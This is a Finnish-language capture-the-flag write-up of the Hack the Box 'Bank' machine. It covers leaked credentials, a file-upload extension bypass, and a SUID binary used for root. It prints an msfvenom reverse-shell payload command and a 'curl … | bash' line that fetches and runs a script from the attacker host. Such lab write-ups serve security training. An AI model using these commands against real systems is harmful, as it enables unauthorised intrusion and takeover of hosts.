Hack the Box: Bank

Ensimmäisenä toimenpiteenä lisätty /etc/hosts -tiedostoon kohteen IP-osoite 10.10.10.29 vastaamaan osoitetta: bank.htb

User flag

Nmap-skannauksesta huomataan, että kohteessa on avoinna portit 22 (SSH), 53 (DNS) ja 80 (HTTP). Kohteessa on Linux-käyttöjärjestelmä.

Selaimella aukaistu osoite http://bank.htb/ ja sivu uudelleenohjasi kirjautumissivulle: http://bank.htb/login.php, jossa voidaan kirjautua sähköpostiosoitteen avulla.

Gobusterilla tehty hakemistoskannaus käyttäen sanalistaa
directory-list-lowercase-2.3-medium.txt

Gobuster löysi saatavilla olevat hakemistot: /uploads, /assets, /inc ja /balance-transfer.

Selaimella aukaistu osoite: http://bank.htb/balance-transfer. Sivulta nähdään .acc -tiedostoja, joista tiedosto 68576f20e9732f1b2edc4df5b8533230.acc on kooltaan noin puolet pienempi kuin kaikki muut hakemiston tiedostot.

Tiedosto 68576f20e9732f1b2edc4df5b8533230.acc ladattu hyökkäyskoneelle ja tiedostosta nähdään sähköposti: chris@bank.htb ja salasana: !##HTBB4nkP4ssw0rd!##

Onnistuneesti kirjauduttu löydetyillä tunnuksilla kirjautumissivulta http://bank.htb/login.php.

Aukesi sivu: http://bank.htb/index.php, jossa dashboardilla nähdään tilitietoja.

Navigoitu support-välilehdelle (http://bank.htb/support.php), jossa on mahdollisuus tehdä tukipyyntö, johon voi sisällyttää tiedoston. Ladattu tukipyyntöön reverse shell -tiedosto: php-reverse-shell.php, johon muokattu hyökkäyskoneen IP-osoite ja portti 443.

Submit-painikkeen painamisen jälkeen saatiin virheilmoitus, että vain kuvatiedostoja voidaan ladata liitetiedostoina.

Sivun http://bank.htb/support.php lähdekoodista huomataan vihreällä näkyvä teksti: “I added the file extension .htb to execute as php for debugging purposes only”.

Msfvenomilla luotu PHP reverse shell .htb tiedostopäätteellä:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=443 -f raw > shell.htb

Onnistuneesti ladattu reverse shell -tiedosto shell.htb.

Metasploitissa otettu multi handler käyttöön, ja asetettu sama payloadi, oma IP-osoite ja portti 443, jotka myös asetettiin tehtyyn reverse shelliin.

Suoritettu exploit ja selaimella aukaistu osoite: http://bank.htb/uploads/shell.htb. Onnistuneesti saatu Meterpreter shell kohteeseen.

User flag löytyi hakemistosta /home/chris.

Root flag

Selvitetään LinPEAS-skriptin avulla mahdollisia keinoja saada root-oikeudet kohteessa.

Hyökkäyskoneessa käynnistetty Python HTTP-palvelin samassa hakemistossa, jossa linpeas.sh tiedosto sijaitsee.

Kohteessa ladattu ja suoritettu LinPEAS komennolla:

curl 10.10.14.3/linpeas.sh | bash

LinPEAS löysi normaalisti poikkeavan SUID-tiedoston: /var/htb/bin/emergency.

Siirrytty kohteessa hakemistoon /var/htb/bin ja suoritettu tiedosto emergency.

Huomataan, että tiedoston suorittamisen jälkeen saatiin root-oikeudet.

Root flag löytyi hakemistosta /root.